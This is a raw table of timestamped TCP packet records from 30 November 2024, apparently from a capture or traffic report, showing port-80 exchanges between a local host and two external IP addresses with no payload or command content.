Nov 30, 2024 04:06:53.868041992 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.869242907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.869354010 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.869401932 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.870614052 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.870722055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.870767117 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.872009039 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.872072935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.872116089 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.873364925 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.873487949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.873533010 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.874732018 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.874846935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.874890089 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.876127005 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.876250982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.876295090 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.877487898 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.877610922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.877674103 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.878848076 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.878957987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.879004955 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.880260944 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.880436897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.880486012 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.881599903 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.881736994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.881755114 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.881783962 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.881839037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.881844997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.881891012 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.882265091 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.882308006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.882339001 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.882386923 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.882967949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.883061886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.883105040 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.883347988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.883393049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.883465052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.883510113 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.884335041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.884464025 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.884475946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.884512901 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.884576082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.884589911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.884639025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.885543108 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.885601997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.885684967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.885736942 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.885749102 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.886106968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.886207104 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.886605978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.886656046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.886724949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.886774063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.887075901 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.887187004 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.887233973 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.887697935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.887743950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.887799025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.887845993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.888473988 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.888623953 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.888737917 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.888782978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.888832092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.888979912 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.889024973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.889847040 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.889910936 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.889920950 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.889950037 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.890000105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.890033007 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.890075922 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.891005993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.891057014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.891135931 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.891184092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.891211987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.891223907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.891259909 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.892054081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.892163992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.892573118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.892664909 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.893146038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.893238068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.893934965 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.894047022 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.894211054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.894328117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.895343065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.895399094 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.895418882 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.895515919 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.896423101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.896503925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.896742105 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.896832943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.897535086 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.897627115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.898147106 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.898243904 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.898591995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.898701906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.899483919 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.899600983 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.899722099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.899733067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.900795937 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.900861979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.900872946 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.900975943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.902558088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.902601004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.902777910 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.902790070 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.903023958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.903153896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.903526068 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.904015064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.904125929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.905129910 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.905236006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.906199932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.906301022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.907286882 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.907339096 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.907344103 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.907380104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.908358097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.908482075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.909442902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.909542084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.909678936 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.909682035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.909727097 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.909728050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.909764051 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.909849882 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.909851074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.909934998 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.910523891 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.910644054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.910670042 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.910756111 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.911612034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.911662102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.911741972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.911791086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.912693977 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.912738085 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.912791014 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.912836075 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.913778067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.913822889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.913887024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.913929939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.914930105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.914947987 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.914975882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.914989948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.915960073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.916004896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.916074991 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.916116953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.917061090 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.917105913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.917172909 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.917212009 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.918135881 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.918250084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.918256998 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.918370962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.919224977 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.919280052 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.919306993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.919356108 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.920319080 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.920365095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.920434952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.920478106 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.922199965 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.922261953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.922307014 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.922358036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.922472954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.922522068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.922580957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.922632933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.923563957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.923615932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.923667908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.923717976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.924679041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.924738884 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.924777985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.924827099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.925745964 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.925865889 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.925913095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.925976992 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.926832914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.926882029 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.926930904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.926975012 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.927953005 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.927998066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.928055048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.928098917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.929028988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.929074049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.929162025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.929198980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.930097103 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.930145979 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.930167913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.930214882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.931180000 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.931231022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.931291103 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.931330919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.932262897 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.932308912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.932377100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.932426929 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.933356047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.933404922 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.933460951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.933595896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.934432983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.934485912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.934541941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.934592962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.935517073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.935565948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.935623884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.935674906 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.936608076 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.936650991 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.936717033 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.936773062 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.937693119 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.937741995 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.937810898 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.937865019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.938719988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.938770056 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.954184055 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.000760078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.000874996 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.000926971 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.001440048 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.001514912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.001557112 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.002808094 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.002829075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.002870083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.004184961 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.026583910 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.026787043 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.027185917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.027209044 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.028408051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.028502941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.028529882 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.029576063 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.029680967 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.029772997 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.030786037 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.030834913 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.030870914 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.032002926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.032041073 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.032111883 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.033199072 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.033246994 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.033301115 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.034308910 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.034353018 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.034393072 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.035412073 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.035453081 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.035540104 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.036523104 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.036562920 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.036634922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.037651062 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.037709951 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.037735939 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.038731098 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.038784027 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.038909912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.039860964 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.039920092 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.039947033 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.040962934 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.041003942 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.041042089 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.042083025 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.042177916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.043196917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.043320894 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.043833971 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.044312954 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.044363976 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.044413090 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.045392990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.045505047 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.046544075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.046641111 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.047027111 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.047630072 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.047777891 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.047882080 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.048732996 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.048782110 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.048840046 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.049863100 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.049911022 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.049927950 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.050951004 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.050998926 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.051034927 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.052076101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.052120924 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.052125931 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.053227901 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.053342104 CET	80	49894	185.215.113.16	192.168.2.4
